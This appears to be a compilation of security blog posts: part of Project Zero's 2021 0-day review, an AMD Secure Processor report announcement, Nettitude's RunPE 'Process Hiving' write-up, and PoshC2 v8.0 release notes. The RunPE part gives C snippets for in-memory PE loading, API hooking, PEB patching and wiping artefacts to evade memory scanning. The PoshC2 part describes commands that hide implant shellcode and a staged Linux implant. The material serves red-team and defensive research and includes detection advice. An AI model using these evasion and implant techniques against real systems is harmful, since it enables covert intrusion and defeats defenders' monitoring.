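To make the “computationally equivalent” point concrete, here is a minimal C sketch of the underlying idea (illustrative only, not code from the exploit, and the function names are ours): NAND alone is enough to express the other logic gates and a one-bit adder, which is the principle the exploit applies at enormous scale with JBIG2 segment operations.

#include <stdio.h>

/* NAND is functionally complete: every other gate can be derived from it. */
static int nand_g(int a, int b) { return !(a && b); }
static int not_g(int a)         { return nand_g(a, a); }
static int and_g(int a, int b)  { return not_g(nand_g(a, b)); }
static int or_g(int a, int b)   { return nand_g(not_g(a), not_g(b)); }
static int xor_g(int a, int b)  { return and_g(or_g(a, b), nand_g(a, b)); }

int main(void)
{
    /* A one-bit full adder built purely from NAND-derived gates. */
    int a = 1, b = 1, carry_in = 0;
    int sum       = xor_g(xor_g(a, b), carry_in);
    int carry_out = or_g(and_g(a, b), and_g(carry_in, xor_g(a, b)));
    printf("sum=%d carry=%d\n", sum, carry_out); /* 1 + 1 + 0 -> sum=0 carry=1 */
    return 0;
}

Chain enough of these primitives together and you can search memory and do arithmetic, which is exactly what the quoted 70,000 segment commands achieve inside the JBIG2 decoder.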

This is an example of what making 0-day exploitation hard could look like: attackers having to develop a new and novel way to exploit a bug and that method requires lots of expertise and/or time to develop. This year, the two FORCEDENTRY exploits were the only 0-days out of the 58 that really impressed us. Hopefully in the future, the bar has been raised such that this will be required for any successful exploitation.

Android

There were 7 Android in-the-wild 0-days detected and disclosed this year. Prior to 2021 there had only been 1 and it was in 2019: CVE-2019-2215. Like WebKit, this lack of data makes it hard for us to assess trends and changes. Instead, we’ll compare it to public security research.

For the 7 Android 0-days they targeted the following components:

5 of the 7 0-days from 2021 targeted GPU drivers. This is actually not that surprising when we consider the evolution of the Android ecosystem as well as recent public security research into Android. The Android ecosystem is quite fragmented: many different kernel versions, different manufacturer customizations, etc. If an attacker wants a capability against “Android devices”, they generally need to maintain many different exploits to have a decent percentage of the Android ecosystem covered. However, if the attacker chooses to target the GPU kernel driver instead of another component, they will only need to have two exploits since most Android devices use 1 of 2 GPUs: either the Qualcomm Adreno GPU or the ARM Mali GPU.

Public security research mirrored this choice in the last couple of years as well. When developing full exploit chains (for defensive purposes) to target Android devices, Guang Gong, Man Yue Mo, and Ben Hawkes all chose to attack the GPU kernel driver for local privilege escalation. Seeing the in-the-wild 0-days also target the GPU was more of a confirmation rather than a revelation. Of the 5 0-days targeting GPU drivers, 3 were in the Qualcomm Adreno driver and 2 in the ARM Mali driver.

The two non-GPU driver 0-days (CVE-2021-0920 and CVE-2021-1048) targeted the upstream Linux kernel. Unfortunately, these 2 bugs shared a singular characteristic with the Android in-the-wild 0-day seen in 2019: all 3 were previously known upstream before their exploitation in Android. While the sample size is small, it’s still quite striking to see that 100% of the known in-the-wild Android 0-days that target the kernel are bugs that actually were known about before their exploitation.

The vulnerability now referred to as CVE-2021-0920 was actually found in September 2016 and discussed on the Linux kernel mailing lists. A patch was even developed back in 2016, but it didn’t end up being submitted. The bug was finally fixed in the Linux kernel in July 2021 after the detection of the in-the-wild exploit targeting Android. The patch then made it into the Android security bulletin in November 2021.

CVE-2021-1048 remained unpatched in Android for 14 months after it was patched in the Linux kernel. The Linux kernel was actually only vulnerable to the issue for a few weeks, but due to Android patching practices, that few weeks became almost a year for some Android devices. If an Android OEM synced to the upstream kernel, then they likely were patched against the vulnerability at some point. But many devices, such as recent Samsung devices, had not and thus were left vulnerable.

Microsoft Exchange Server

In 2021, there were 5 in-the-wild 0-days targeting Microsoft Exchange Server. This is the first time any Exchange Server in-the-wild 0-days have been detected and disclosed since we began tracking in-the-wild 0-days. The first four (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065)  were all disclosed and patched at the same time and used together in a single operation. The fifth (CVE-2021-42321) was patched on its own in November 2021. CVE-2021-42321 was demonstrated at Tianfu Cup and then discovered in-the-wild by Microsoft. While no other in-the-wild 0-days were disclosed as part of the chain with CVE-2021-42321, the attackers would have required at least another 0-day for successful exploitation since CVE-2021-42321 is a post-authentication bug.

Of the four Exchange in-the-wild 0-days used in the first campaign, CVE-2021-26855, which is also known as “ProxyLogon”, is the only one that’s pre-auth. CVE-2021-26855 is a server side request forgery (SSRF) vulnerability that allows unauthenticated attackers to send arbitrary HTTP requests as the Exchange server. The other three vulnerabilities were post-authentication. For example, CVE-2021-26858 and CVE-2021-27065 allowed attackers to write arbitrary files to the system. CVE-2021-26857 is a remote code execution vulnerability due to a deserialization bug in the Unified Messaging service. This allowed attackers to run code as the privileged SYSTEM user.

For the second campaign, CVE-2021-42321, like CVE-2021-26858, is a post-authentication RCE vulnerability due to insecure deserialization. It seems that while attempting to harden Exchange, Microsoft inadvertently introduced another deserialization vulnerability.

While a significant number of 0-days in Exchange were detected and disclosed in 2021, it’s important to remember that they were all used as 0-days in only two different campaigns. This is an example of why we don’t suggest using the number of 0-days in a product as a metric to assess the security of a product. Requiring the use of four 0-days for attackers to have success is preferable to an attacker only needing one 0-day to successfully gain access.

While this is the first time Exchange in-the-wild 0-days have been detected and disclosed since Project Zero began our tracking, this is not unexpected. In 2020 there was n-day exploitation of Exchange Servers. Whether this was the first year that attackers began the 0-day exploitation or if this was the first year that defenders began detecting the 0-day exploitation, this is not an unexpected evolution and we’ll likely see it continue into 2022.

Outstanding Questions

While there has been progress on detection and disclosure, that progress has shown just how much work there still is to do. The more data we gained, the more questions that arose about biases in detection, what we’re missing and why, and the need for more transparency from both vendors and researchers.

Until the day that attackers decide to happily share all their exploits with us, we can’t fully know what percentage of 0-days are publicly known about. However when we pull together our expertise as security researchers and anecdotes from others in the industry, it paints a picture of some of the data we’re very likely missing. From that, these are some of the key questions we’re asking ourselves as we move into 2022:

Where are the [x] 0-days?

Despite the number of 0-days found in 2021, there are key targets missing from the 0-days discovered. For example, we know that messaging applications like WhatsApp, Signal, Telegram, etc. are targets of interest to attackers, and yet only one messaging app 0-day, in this case in iMessage, was found this past year. Since we began tracking in mid-2014 the total is two: a WhatsApp 0-day in 2019 and this iMessage 0-day found in 2021.

Along with messaging apps, there are other platforms/targets we’d expect to see 0-days targeting, yet there are no or very few public examples. For example, since mid-2014 there’s only one in-the-wild 0-day each for macOS and Linux. There are no known in-the-wild 0-days targeting cloud, CPU vulnerabilities, or other phone components such as the WiFi chip or the baseband.

This leads to the question of whether these 0-days are absent due to lack of detection, lack of disclosure, or both?

Do some vendors have no known in-the-wild 0-days because they’ve never been found or because they don’t publicly disclose?

Unless a vendor has told us that they will publicly disclose exploitation status for all vulnerabilities in their platforms, we, the public, don’t know if the absence of an annotation means that there is no known exploitation of a vulnerability or if there is, but the vendor is just not sharing that information publicly. Thankfully this question is something that has a pretty clear solution: all device and software vendors agreeing to publicly disclose when there is evidence to suggest that a vulnerability in their product is being exploited in-the-wild.

Are we seeing the same bug patterns because that’s what we know how to detect?

As we described earlier in this report, all the 0-days we saw in 2021 had similarities to previously seen vulnerabilities. This leads us to wonder whether or not that’s actually representative of what attackers are using. Are attackers actually having success exclusively using vulnerabilities in bug classes and components that are previously public? Or are we detecting all these 0-days with known bug patterns because that’s what we know how to detect? Public security research would suggest that yes, attackers are still able to have success with using vulnerabilities in known components and bug classes the majority of the time. But we’d still expect to see a few novel and unexpected vulnerabilities in the grouping. We posed this question back in the 2019 year-in-review and it still lingers.

Where are the spl0itz?

To successfully exploit a vulnerability there are two key pieces that make up that exploit: the vulnerability being exploited, and the exploitation method (how that vulnerability is turned into something useful).

Unfortunately, this report could only really analyze one of these components: the vulnerability. Out of the 58 0-days, only 5 have an exploit sample publicly available. Discovered in-the-wild 0-days are the failure case for attackers and a key opportunity for defenders to learn what attackers are doing and make it harder, more time-intensive, more costly, to do it again. Yet without the exploit sample or a detailed technical write-up based upon the sample, we can only focus on fixing the vulnerability rather than also mitigating the exploitation method. This means that attackers are able to continue to use their existing exploit methods rather than having to go back to the design and development phase to build a new exploitation method. While acknowledging that sharing exploit samples can be challenging (we have that challenge too!), we hope in 2022 there will be more sharing of exploit samples or detailed technical write-ups so that we can come together to use every possible piece of information to make it harder for the attackers to exploit more users.

As an aside, if you have an exploit sample that you’re willing to share with us, please reach out. Whether it’s sharing with us and having us write a detailed technical description and analysis or having us share it publicly, we’d be happy to work with you.

Conclusion

Looking back on 2021, what comes to mind is “baby steps”. We can see clear industry improvement in the detection and disclosure of 0-day exploits. But the better detection and disclosure has highlighted other opportunities for progress. As an industry we’re not making 0-day hard. Attackers are having success using vulnerabilities similar to what we’ve seen previously and in components that have previously been discussed as attack surfaces. The goal is to force attackers to start from scratch each time we detect one of their exploits: they’re forced to discover a whole new vulnerability, they have to invest the time in learning and analyzing a new attack surface, and they must develop a brand new exploitation method. And while we made distinct progress in detection and disclosure, that progress has shown us areas where we can continue to improve.

While this all may seem daunting, the promising part is that we’ve done it before: we have made clear progress on previously daunting goals. In 2019, we discussed the large detection deficit for 0-day exploits and two years later more than double that number were detected and disclosed. So while there is still plenty more work to do, it’s a tractable problem. There are concrete steps that the tech and security industries can take to make even more progress:

  1. Make it an industry standard behavior for all vendors to publicly disclose when there is evidence to suggest that a vulnerability in their product is being exploited.
  2. Vendors and security researchers sharing exploit samples or detailed descriptions of the exploit techniques.
  3. Continued concerted efforts on reducing memory corruption vulnerabilities or rendering them unexploitable.

Through 2021 we continually saw the real world impacts of the use of 0-day exploits against users and entities. Amnesty International, the Citizen Lab, and others highlighted over and over how governments were using commercial surveillance products against journalists, human rights defenders, and government officials. We saw many enterprises scrambling to remediate and protect themselves from the Exchange Server 0-days. And we even learned of peer security researchers being targeted by North Korean government hackers. While the majority of people on the planet do not need to worry about their own personal risk of being targeted with 0-days, 0-day exploitation still affects us all. These 0-days tend to have an outsized impact on society so we need to continue doing whatever we can to make it harder for attackers to be successful in these attacks.

2021 showed us we’re on the right track and making progress, but there’s plenty more to be done to make 0-day hard.

Release of Technical Report into the AMD Security Processor

By: Anonymous
10 May 2022 at 19:00

Posted by James Forshaw, Google Project Zero

Today, members of Project Zero and the Google Cloud security team are releasing a technical report on a security review of AMD Secure Processor (ASP). The ASP is an isolated ARM processor in AMD EPYC CPUs that adds a root of trust and controls secure system initialization. As it's a generic processor AMD can add additional security features to the firmware, but like with all complex systems it's possible these features might have security issues which could compromise the security of everything under the ASP's management.

The security review undertaken was on the implementation of the ASP on the 3rd Gen AMD EPYC CPUs (codenamed "Milan"). One feature of the ASP of interest to Google is Secure Encrypted Virtualization (SEV). SEV adds encryption to the memory used by virtual machines running on the CPU. This feature is of importance to Confidential Computing as it provides protection of customer cloud data in use, not just at rest or when sending data across a network.

A particular emphasis of the review was on the Secure Nested Paging (SNP) extension to SEV added to "Milan". SNP aims to further improve the security of confidential computing by adding integrity protection and mitigations for numerous side-channel attacks. The review was undertaken with full cooperation with AMD. The team was granted access to source code for the ASP, and production samples to test hardware attacks.

The review discovered 19 issues which have been fixed by AMD in public security bulletins. These issues ranged from incorrect use of cryptography to memory corruption in the context of the ASP firmware. The report describes some of the more interesting issues that were uncovered during the review as well as providing a background on the ASP and the process the team took to find security issues. You can read more about the review on the Google Cloud security blog and the final report.

Introducing Process Hiving & RunPE

By: Rob Bone
2 September 2021 at 09:00

Download our whitepaper and tool

This blog is a condensed version of a whitepaper we’ve released, called “Process Hiving”.  It comes with a new tool too, “RunPE”.  You can download these at the links below.

Whitepaper

Our process hiving whitepaper can be downloaded here.

Tool

RunPE, our accompanying tool, can be downloaded from GitHub.

High quality red team operations are research-led. Being able to simulate current and emerging threats at an accurate level is of paramount importance if the engagement is going to provide value to clients.

One common use case for offensive operations is the requirement to run native executable files or compiled code on the target and in memory. Loading and running these files in memory is not a new technique, but running executables as secondary modules within a Command & Control (C2) framework is rarer, particularly those that support arguments from the host process.

This blog introduces innovative techniques and a must-have tool for the red team arsenal. RunPE is a .NET assembly that uses a technique called Process Hiving to manually load an unmanaged executable into memory along with all its dependencies, run that executable with arguments passed at runtime, capture any output, and then clean up and restore memory to hide any trace that it was run.

What is it?

The aim of this project is to develop a .NET assembly that provides a mechanism for running arbitrary unmanaged executables in memory. It should allow arguments to be provided, load any libraries that are required by the code, obtain any STDOUT and STDERR from the process execution, and not terminate the host process once the execution of the loaded PE finishes.

This .NET assembly must be able to be run in the normal way in C2 frameworks, such as by execute-assembly in Cobalt Strike or run-exe in PoshC2, in order to extend the functionality of those frameworks.

Finally, as this is to all take place in an implant process, any artefacts in memory should then be cleaned up by zeroing out the memory and removing them or restoring original values in order to better hide the activity.

We’re calling this technique of running multiple PEs from within the same process ‘Process Hiving’, and the result of this work is the .NET assembly RunPE. In essence this technique:

  • Receives a file path or base64 blob of a PE to run
  • Manually maps that file into memory without using the Windows Loader in the host process
  • Loads any dependencies required by the target PE
  • Patches memory to provide arguments to the target PE when it is run
  • Patches various API calls to allow the target PE to run correctly
  • Replaces the file descriptors in use to capture output
  • Patches various API calls to prevent the host process from exiting when the PE finishes executing
  • Runs the target PE from within the host process, while maintaining host process functionality
  • Restores memory, unloads dependencies, removes patches and cleans up artefacts in memory after executing

Loading the PE

The starting point for the work was @subtee‘s .NET PE Loader utilised in GhostPack’s SafetyKatz. This .NET PE Loader already mapped a PE into memory manually and invoked the entry point, however a few issues remained that prevented its use in an implant process. SafetyKatz uses a ‘slightly modified’ version of Mimikatz as the target PE, critically modified so that it does not require arguments or exit the process upon completion.

The first step then was to re-use as much of this work as possible and rewrite it to suit our needs – no need to reinvent the wheel when a lot of great work was already done. The modified loader manually maps the target PE into memory, performs any fixups and then loads any dependency DLLs that are not already loaded. The Import Address Table for the PE is patched with the locations of all the libraries once they are loaded, mimicking the real Windows loader.

Patching Arguments

In a Windows process a pointer to the command line arguments is located in the Process Environment Block (PEB) and can be retrieved directly or, more commonly, using the Windows API call GetCommandLine. Similarly, the current image name is also stored in the PEB. With RunPE, the command line and image name are backed-up for when we reset during the clean-up phase and then replaced with the new values for the target PE.
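As a minimal sketch of what that swap can look like (our illustration in C, assuming x64, MSVC and the structure definitions in winternl.h; RunPE itself does the equivalent from .NET, and the function names below are ours), the relevant fields are the CommandLine and ImagePathName UNICODE_STRINGs hanging off the PEB's ProcessParameters:

#include <windows.h>
#include <winternl.h>
#include <intrin.h>
#include <wchar.h>

static void set_unicode_string(UNICODE_STRING *dst, wchar_t *src)
{
    dst->Buffer        = src;
    dst->Length        = (USHORT)(wcslen(src) * sizeof(wchar_t));
    dst->MaximumLength = dst->Length + sizeof(wchar_t);
}

/* The original UNICODE_STRINGs should be backed up first so the clean-up
   phase can restore them, as described above. */
void patch_peb_arguments(wchar_t *new_command_line, wchar_t *new_image_path)
{
    PEB *peb = (PEB *)__readgsqword(0x60);   /* on x64 the PEB pointer lives at gs:[0x60] */
    RTL_USER_PROCESS_PARAMETERS *params = peb->ProcessParameters;

    set_unicode_string(&params->CommandLine,   new_command_line);
    set_unicode_string(&params->ImagePathName, new_image_path);
}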


Preventing Process Exit

Another issue with running vanilla PEs in this way is that when they finish executing the PE inevitably tries to exit the process, such as by calling TerminateProcess.

Similarly, as the RunPE process is .NET, the CLR also tries to shut down once process termination is initiated, so even if TerminateProcess is prevented CorExitProcess will cause any .NET implant to exit.

To circumvent this, a number of these API calls are patched to instead jmp to ExitThread. As the entry point of the target PE is run in a new thread, this means that once it has finished it will gracefully exit that thread only, leaving the process and CLR running.

These API calls are patched with bytes that use Return Oriented Programming (ROP) to instead call ExitThread, passing an exit code of 0.


An example of this patch if the ExitThread function was located at 0x1337133713371337 is below:

0: 48 c7 c1 00 00 00 00 mov rcx, 0x0 // Move 0 into rcx for exit code argument
7: 48 b8 37 13 37 13 37 movabs rax, 0x1337133713371337 // Move address of ExitThread into rax
e: 13 37 13
11: 50 push rax // Push rax onto stack and ret, so this value will be the 'return address'
12: c3 ret
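For illustration, a minimal sketch of assembling and applying such a patch at runtime might look like the following (our example in C; RunPE builds the equivalent bytes from .NET and patches several exit routines, not just the one shown, and the function name is ours):

#include <windows.h>
#include <string.h>

void patch_terminate_to_exit_thread(void)
{
    unsigned char patch[] = {
        0x48, 0xC7, 0xC1, 0x00, 0x00, 0x00, 0x00,   /* mov rcx, 0               */
        0x48, 0xB8, 0, 0, 0, 0, 0, 0, 0, 0,         /* movabs rax, <ExitThread> */
        0x50,                                        /* push rax                 */
        0xC3                                         /* ret                      */
    };
    FARPROC exit_thread = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "ExitThread");
    memcpy(&patch[9], &exit_thread, sizeof(exit_thread));  /* fill in the runtime address */

    FARPROC target = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "TerminateProcess");
    DWORD old_protect;
    /* The original bytes at 'target' should be saved here so clean-up can restore them. */
    VirtualProtect((LPVOID)target, sizeof(patch), PAGE_EXECUTE_READWRITE, &old_protect);
    memcpy((void *)target, patch, sizeof(patch));
    VirtualProtect((LPVOID)target, sizeof(patch), old_protect, &old_protect);
}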

We can see this in x64dbg while RunPE is running, viewing the NtTerminateProcess function and noting it has been patched to exit the thread instead.

Fixing APIs

Several other API calls also required patching with new values in order for PEs to work. One example is GetModuleHandle which, if called with a NULL parameter, returns a handle to the base of the main module. When a PE calls this function it is expecting to receive its base address, however in this scenario the API call will in fact return the host process’ binary’s base address, which could cause the whole process to crash, depending on how that address is then used.

However, GetModuleHandle could also be called with a non-NULL value, in which case the base address of a different module will be returned.

GetModuleHandle is therefore hooked and execution jumps to a newly allocated area of memory that performs some simple logic: returning the base address of the mapped PE if the argument is NULL and rerouting back to the original GetModuleHandle function if not. As the first few bytes of GetModuleHandle get overwritten with a jump to our hook, these instructions must be executed in the hook before jumping back into the GetModuleHandle function, returning execution to just after the hook jump.

As with the previous API patches, these bytes must be dynamically built in order to provide the runtime addresses of the hook location, the GetModuleHandle function and the base address of the target PE.
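Expressed as ordinary C rather than runtime-generated machine code, the hook's logic is roughly the following (our sketch; the global names are hypothetical and assumed to be populated by the loader):

#include <windows.h>

static void *g_mapped_pe_base;                                   /* base of the manually mapped PE */
static HMODULE (WINAPI *g_original_GetModuleHandleW)(LPCWSTR);   /* continues into the real function */

HMODULE WINAPI hooked_GetModuleHandleW(LPCWSTR module_name)
{
    if (module_name == NULL)
        return (HMODULE)g_mapped_pe_base;   /* present the mapped PE as the main module */

    /* Otherwise execute the bytes overwritten by the hook and continue in the
       real GetModuleHandleW just after the hook jump. */
    return g_original_GetModuleHandleW(module_name);
}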


As an additional change the PEB is also updated, replacing the base address with that of the target PE so that if any programs retrieve this address from the PEB directly then they get the expected value.

At this point, the target PE should be in a position to be able to run from within the host process by calling the entry point of the PE directly. However, as the intended use case is to be able to use RunPE to execute PEs in memory from within an implant, it is a requirement to be able to capture output from the program.

Capturing Output

Output is captured from the target process by replacing the handles to STDOUT and STDERR with handles to anonymous pipes using SetStdHandle.


Just before the target PE entry point is invoked on a new thread, an additional thread is first created that will read from these pipes until they are closed. In this way, the output is captured and can be returned from RunPE. The pipes are closed by RunPE after the target PE has finished executing, ensuring that all output is captured.
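A minimal sketch of the STDOUT half of this is below (our illustration in C; RunPE does the same for STDERR and from .NET, and the function names here are ours):

#include <windows.h>
#include <stdio.h>

static HANDLE g_pipe_read, g_pipe_write, g_old_stdout;

static DWORD WINAPI reader_thread(LPVOID unused)
{
    char buf[4096];
    DWORD n;
    (void)unused;
    /* Runs until the write end is closed after the target PE finishes. */
    while (ReadFile(g_pipe_read, buf, sizeof(buf), &n, NULL) && n > 0)
        fwrite(buf, 1, n, stderr);           /* hand the captured output back to the implant */
    return 0;
}

void capture_stdout(void)
{
    CreatePipe(&g_pipe_read, &g_pipe_write, NULL, 0);
    g_old_stdout = GetStdHandle(STD_OUTPUT_HANDLE);   /* backed up for clean-up */
    SetStdHandle(STD_OUTPUT_HANDLE, g_pipe_write);
    CreateThread(NULL, 0, reader_thread, NULL, 0, NULL);
}

void restore_stdout(void)
{
    SetStdHandle(STD_OUTPUT_HANDLE, g_old_stdout);
    CloseHandle(g_pipe_write);                /* the reader thread sees EOF, drains, and exits */
}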

Clean Up

As Process Hiving includes running multiple processes from within one, long-running host process it is important that any execution of these ‘sub’ processes includes full and proper clean up. This serves two purposes:

  • To restore any changed state and functionality in order to ensure that the host process can continue to operate normally.
  • To remove any artefacts from memory that may cause an alert if detected through techniques such as in-memory scanning, or aid an investigator in the event of a manual triage.

To achieve this, any code change made by RunPE is stored during execution and restored once execution is complete. This includes API hooks, changed values in memory, file descriptors, loaded modules and of course the mapped PE itself. In the case of any particularly sensitive values, such as the command line arguments and mapped PE, the memory region is first zeroed out before it is freed.
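For the sensitive regions, the "zero, then free" step could be as simple as the following sketch (ours, not RunPE's exact code; the region pointer and size are whatever was recorded when the PE was mapped):

#include <windows.h>

void wipe_and_free(void *region, SIZE_T size)
{
    SecureZeroMemory(region, size);        /* remove the artefact from memory first */
    VirtualFree(region, 0, MEM_RELEASE);   /* then release the whole allocation */
}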


Demonstration

An example of RunPE running unchanged and up-to-date Mimikatz is below, alongside Procmon process activity events for the process.


Note that there are no sub-processes created, and Mimikatz runs successfully with the provided arguments.

Running a debug build provides more output and allows us to verify that the artefacts are being removed from memory and hooks removed, etc. We can see below that after the clean-up has occurred the ‘new’ DLLs loaded for Mimikatz have either already been cleaned up by Mimikatz itself (the error code 126) or are freed by RunPE and are now no longer visible in the Modules tab of Process Hacker.


Similarly, the original code on the hooks such as NtTerminateProcess has been restored, which we can verify using a debugger such as x64dbg as below.


As during Red Team operations Mimikatz.exe is unlikely to exist in the target environment, RunPE also supports loading of binaries from base64 blobs so that they can be passed with arguments down C2 channels. Long, triple dash switches are used in order to avoid conflicts with any arguments to the target PE.


An example of this from a PoshC2 implant below demonstrates the original use case. The implant host process of netsh.exe loads and invokes the RunPE .NET assembly which in turn loads and runs net.exe in the host process with arguments. In this case net.exe is passed as a base64 blob down C2.


Known Issues & Further Work

There are a number of known issues and caveats with this work in its current state which are detailed below.

  • RunPE only supports 64-bit (x64) native Windows PE files.
  • During testing, any modern PE compiled by the testers has worked without issues; however, issues remain with a number of older Windows binaries such as ipconfig.exe and icacls.exe. Further research is ongoing into what specific characteristics of these files cause issues.
  • If the target PE spawns sub-processes itself then those are not subject to Process Hiving and will be created in the normal fashion. It is up to the operator to understand the behaviour of the target PE and any other considerations that should be made.
  • RunPE presently calls the entry point of the target PE on a new thread and waits for that thread to finish, with a timeout. If the timeout is reached or if the target PE manipulates that thread, this is undefined behaviour.
  • PEs compiled without ASLR support, such as those built with MinGW, do not currently work.

Additionally, further work can be made on RunPE to improve the stealth of the Process Hiving technique:

  • Dependencies of the target PE can be mapped into memory using the same PE loader as the target PE itself and not using the standard Windows Loader. This would bypass detections on API calls such as LoadLibrary and GetProcAddress as well as any hooks placed in those modules by defensive software.
  • For any native API calls that remain, the use of syscalls directly can be explored to achieve the same ends for the same reasons as described above.

Detections

For Blue Team members, the best way to prevent this technique is to prevent the attacker from reaching this stage in the kill chain. Delivery and initial execution for example likely provide more options for detecting an attack than process self-manipulation. However, a number of the actions taken by RunPE can be explored as detections.

  • SetStdHandle is called six times per RunPE call, once to set STDOUT, STDERR and STDIN to handles to anonymous pipes and then again to reset them. A cursory monitor of a number and range of processes on the author’s own machine did not show any invocations of this API call as part of standard use, so this activity could potentially be used to detect RunPE.
  • A number of APIs are hooked or modified and then restored as part of every RunPE run such as GetCommandLine, NtTerminateProcess, CorExitProcess, RtlExitUserProcess, GetModuleHandle and TerminateProcess. Continued modification of these Windows API calls in memory is not likely to be common behaviour and a potential avenue to detection.
  • Similarly, the PEB is also continually modified as the command line string and image name are updated with every invocation of RunPE.
  • While the source code can be obfuscated, any attempt to load the default RunPE assembly into a .NET process provides a strong opportunity for detection.

Conclusion

At its core, Process Hiving is a fairly simple process. A PE is manually mapped into memory using existing techniques and a number of changes are made to API calls and the environment so that when the entry point of that PE is invoked it runs in the expected way.

We hope that this technique and the tool that implements it will allow Red Teams to be able to quickly and easily run native binaries from their implant processes without having to deal with many of the pain points that plague similar techniques that already exist.

The source code for RunPE is available at https://github.com/nettitude/RunPE and any further work on the tool can be found there. Contributions and collaboration are also welcome.



Introducing PoshC2 v8.0

We’re thrilled to announce a new release of PoshC2 packed full of new features, modules, major improvements, and bug fixes. This includes the introduction of a brand-new native Linux implant and the capability to execute Beacon Object Files (BOF) directly from PoshC2!

Download and Documentation

Please use the following links for download and documentation:

RunOF Capability

In this release, we have introduced Joel Snape’s (@jdsnape) excellent method to run Cobalt Strike Beacon Object Files (BOF) in .NET and its integration in PoshC2. This feature has a blog post of its own, but essentially it allows existing BOFs to be run in any C# implant, including PoshC2.


At a high-level, here is how it works:

  • Receive or open a BOF file to run
  • Load it into memory
  • Resolve any relocations that are present
  • Set memory permissions correctly
  • Locate the entry point for the BOF
  • Execute in a new thread
  • Retrieve any data output by the BOF
  • Clean-up memory artifacts before exiting

Read our recent blog post on this for more detail.

SharpSocks Improvements

SharpSocks provides HTTP tunnelled SOCKS proxying capability to PoshC2 and has been rewritten and modernised to improve stability and usability, in addition to having its integration with PoshC2 improved, so that it can be more clearly and easily configured and used.


RunPE Integration

Last year, Rob Bone (@m0rv4i) and Ben Turner (@benpturner) released a whitepaper on “Process Hiving” along with a new tool “RunPE”, the source code of which can be found here. We have integrated this technique within this release of PoshC2 for ease of use, and it can be executed as follows:


By default, new executables can be added to /opt/PoshC2/resources/modules/PEs so that PoshC2 knows where to find them when using the runpe and runpe-debug commands shown above.

DllSearcher

We’ve added the dllsearcher command which allows operators to search for specific module names loaded within the implant’s current process, for instance:


GetDllBaseAddress, FreeMemory & RemoveDllBaseAddress

Three evasion-related commands were added which can be used to hide the presence of malicious shellcode in memory. getdllbaseaddress is used to retrieve the implant shellcode’s current base address, for example:


Looking at our process in Process Hacker, we can correlate this base address memory location:


By using the freememory command, we can then clear this address’ memory space:


The removedllbaseaddress command is a combination of getdllbaseaddress and freememory, which can be used to expedite the above process by automatically finding and freeing the relevant implant shellcode’s memory space:


Get-APICall & DisableEnvironmentExit

In this commit we implemented a means for operators to retrieve the memory location of specific function calls via get-apicall, for instance:


In addition, we’ve included disableenvironmentexit which patches and prevents calls to Environment.Exit() within the current implant. This can be particularly useful when executing modules containing this call which may inadvertently kill our implant’s process.

C# Ping, IPConfig, and NSLookup Modules

Several new C# modules related to network operations were developed and added to this release, thanks to Leo Stavliotis (@lstavliotis). They can be run using the following new commands:

  • ping <ip/hostname>
  • nslookup <ip/hostname>
  • ipconfig

C# Telnet Client

A simple Telnet client module has been developed by Charley Celice (@kibercthulhu) and embedded in the C# implant handler to provide operators the ability to quickly validate Telnet access where needed. It will simply attempt to connect and run an optional command before exiting:


We have plans to add additional modules such as this one to cover a wider range of services.

C# Registry Module

Another module by Charley Celice (@kibercthulhu) was added. SharpReg allows for common registry operations in Windows. At this stage it currently consists of simple functionalities to search, query, create/edit, delete and audit registry hives, keys, values and data. It can be executed as shown below:


We’re adding more features to this module, which will include expediting certain registry-based persistence, privilege escalation, and UAC bypass techniques, and more.

PoshGrep

PoshGrep can easily be used to parse task outputs. This can be particularly useful when searching for specific process information obtained from a large number of remote hosts. It can be used by piping your PoshC2 command into poshgrep, for example:


The output task database retains the full output for tracking.

FindFile

findfile was added, which can be used to search for specific file names and types. In the example below, we search for any occurrences of the file name “password” within .txt files:


Bringing PoshC2 to Linux

One of the major new features we have incorporated in this release of PoshC2 is our new Native Linux implant, thanks to the great work of Joel Snape (@jdsnape). While it’s fair to say that we spend most of our time on Windows, we find that having the capability to persist on Linux machines (usually servers) can be key to a successful engagement. We also know that many of the adversaries we simulate have developed tooling specifically for Linux. PoshC2 has always had a Python implant which will run on Linux assuming that Python is installed, but we decided that it was time that we advanced our capabilities to a native binary that is harder to detect and has fewer dependencies.

To that end, Posh v8.0 includes a native Linux implant that can run on any* x86/x64 Linux OS with a kernel >= 2.6 (it should work on earlier versions, but we’ve not tested that far back!). It also works on a few systems that aren’t Linux but have implemented enough of the syscall interface (most importantly ESXi hypervisors).

Usage

When payloads are created in PoshC2 you will notice a new “native_linux” payload being written on startup:

Payload

This is the stage one payload, and when executed will contact the C2 server and retrieve the second stage. The first stage is a statically linked stripped executable, around 1MB in size. The second stage is a statically linked shared library, that the first stage will load in memory using a custom ELF loader and execute (see below for more detail). The dropper has been designed to be as compatible as possible, and so should just work out of the box regardless of what userspace is present.

The aim of the implant is not to be “super-stealthy”, but to emulate a common Linux userspace Trojan. Therefore, the implant just needs to be executed directly; how you do this will obviously depend on the level of access you have to your target.

Once the second stage has been downloaded and executed the implant operates in much the same way as the existing Python implant, supporting many of the same commands, and they can be listed with the help command:

[Screenshot: output of the help command]

Most notably, the implant allows you to execute other commands as child processes using /bin/sh, run Python modules (again, assuming a Python interpreter is present on your target), and run the linuxprivchecker script that is present in the Python implant.

Goal

To meet our needs, we set the following high-level goals:

  • Follow the existing pattern of a small stage one loader, with a second stage being downloaded from the C2 server.
  • A native executable, with as few dependencies as possible and that would run on as many different distributions as possible.
  • Compatibility with older distributions, particularly those with an older kernel.
  • As little written to disk as possible beyond the initial loader.
  • Run in user-space (i.e., not a kernel implant).

This gives us greater flexibility and stealth, and allows us to operate on machines that may not have Python installed or where a running Python process would be anomalous.

There are a few choices in language and architecture to build native executables. The “traditional” method is to use C or C++ which compiles to an ELF executable. More modern languages, like Golang, are also an option, and have notably been used by some threat groups to develop native tooling. For this project however we decided to stick with C as it lets us implement small and lean executables.

How it Works

The Linux implant comes in two parts, a dropper and a stage two which is downloaded from the C2.

Compilation of the native images can be a bit time consuming, so we have provided binary images in the PoshC2 distribution (you can see the source code here). This means that when a new implant is generated, PoshC2 needs a way to “inject” its configuration into the binary file. All configuration is contained in the dropper, except for a random key and URI, which are patched over placeholder values in the stage two binary. The configuration lives in an additional ELF section at the end of the binary, and is injected by PoshC2 using objcopy when a new implant is generated. You should note that at the moment there is no obfuscation or encryption of the configuration, so it will be trivially readable with strings or similar.

